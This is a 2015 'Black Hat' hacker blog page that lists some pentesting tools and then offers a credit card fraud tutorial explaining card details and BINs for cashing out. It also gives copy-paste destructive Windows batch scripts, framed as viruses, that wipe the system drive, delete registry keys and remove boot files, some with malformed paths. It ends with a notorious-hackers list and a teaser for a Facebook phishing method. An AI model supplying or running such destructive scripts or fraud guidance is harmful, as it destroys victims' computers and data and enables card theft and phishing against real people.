BLACK HAT

BLACK HAT
REMEMBER ME

Tuesday 6 October 2015

TOP TEN HACKER TOOLS LIST!

 The 2015 Concise Top Ten Hacker Tools List!


This 'TOP TEN' is based on the Kali Linux Distro Hacker Tools 'Top Ten'. Links below take you to videos, books, tutorials and much more!

Nmap

Port Scanner

Nmap is an abbreviation of 'Network Mapper', as is a very well known free open source hackers tool. Nmap is used for network discovery and security auditing. Many system admins use nmap for network inventory, open ports, managing service upgrade schedules, and monitoring host or service uptime. The tool uses raw IP packets in creative ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions and possible patches) and what type and version of packet filters/ firewalls are being used by the target.[...more...]

Metasploit

Vulnerability Exploitation Tool

The Metasploit Project is a hugely popular pentesting or hacking tool that is used by cybersecurity professionals and ethical hackers. Metasploit is essentially a computer security project that supplies information about known security vulnerabilities and helps to formulate penetration testing and IDS testing.[...more...]

HOW TO HACK CREDIT CARD

This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

REMEMBER: WE ARE BLACKHAT! WE DO NOT FORGIVE! WE DO NOT FORGET!
THIS IS BROXKEY!

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Monday 24 August 2015

How to create a blue screen of Death with Notepad


How to create a blue screen of  Death with Notepad


Image result for computer virus
All you need to do is to copy the codes , paste it in any notepad or text file, then save the text file with anyname.vbs , and yeah don't forget to change the format from text file to all files.
*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANENTLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
The blue screen of Death [this might be dangerous] HAHA
Code:
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Broxkey!!

Delete Key Registry Files

Delete Key Registry Files

All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANENTLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*
Code:
CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been destroyed. Have a nice day.
GOTO MESSAGE
HAHA.. Broxkey!!

How to create a virus that deactivates an OS

How to create a virus that deactivates an OS

Here are the steps you should follow to make the virus:
This virus will stop and prevent a computer from starting up and the only solution would be to reinstall windows.
Warning : never try it on your computer.
open up notepad and type in the following
Picture of Hacking With Notepad
 
del "C:windows\SYSTEM32\bootok"
/Q/S >nul
del "C:windows\SYSTEM32\bootvid.dll"
del "C:windows\SYSTEM32\bootvrfy"
After you type these save it as "any name you want ".bat
Please let me know if it works.
Broxkey!!

Top 10 Notorious Black Hat Hackers

 Top 10 Notorious Black Hat Hackers
Kevin Poulsen
a.k.a. Dark Dante
Kevin-Poulsen
The notorious ’80s black hat hacker, Kevin Poulsen, gained recognition for his hacking of the telephone lines for LA radio station KIIS-FM, securing himself a place as the 102nd caller and winning a brand new Porsche 944, among other prizes. Law enforcement dubbed Poulsen the “Hannibal Lecter of computer crime.” Poulsen went underground as a fugitive when the FBI began its search for him, but in 1991, he was finally captured.
He pleaded guilty to seven counts of mail, wire and computer fraud, money laundering, obstruction of justice, and for obtaining information on covert businesses run by the FBI. Kevin Poulsen was sentenced to 51 months in prison (4 years and 3 months), which was the longest sentence ever given for hacking at the time. However, since serving time, Poulsen has worked as a journalist and is now a senior editor for Wired News. Poulsen’s most note-worthy article details his work on identifying 744 sex offenders with MySpace profiles.

Albert Gonzalez

Albert2 Crop Small
Cyber-criminal Albert Gonzalez has been accused of masterminding the biggest ATM and credit card theft in history; from 2005 to 2007, he and his cybergroup had allegedly sold more than 170 million card and ATM numbers. Gonzalez’s team used SQL injection techniques to create malware backdoors on several corporate systems in order to launch packet-sniffing (specifically, ARP Spoofing) attacks, allowing him to steal computer data from internal corporate networks. When he was arrested, authorities seized $1.6 million in cash including $1.1 million found in plastic bags placed in a three-foot drum which had been buried in his parents’ backyard. In 2010, Gonzalez was sentenced to 20 years in federal prison

Monday 13 July 2015

Facebook Phishing ( Undetectable)

Phishing is the attempt to acquire sensitive
information such as usernames, passwords,
and credit card details (and sometimes,
indirectly, money) by masquerading as a
trustworthy entity in an electronic
communication.
New post: Advanced Level Facebook Desktop
Phishing Method -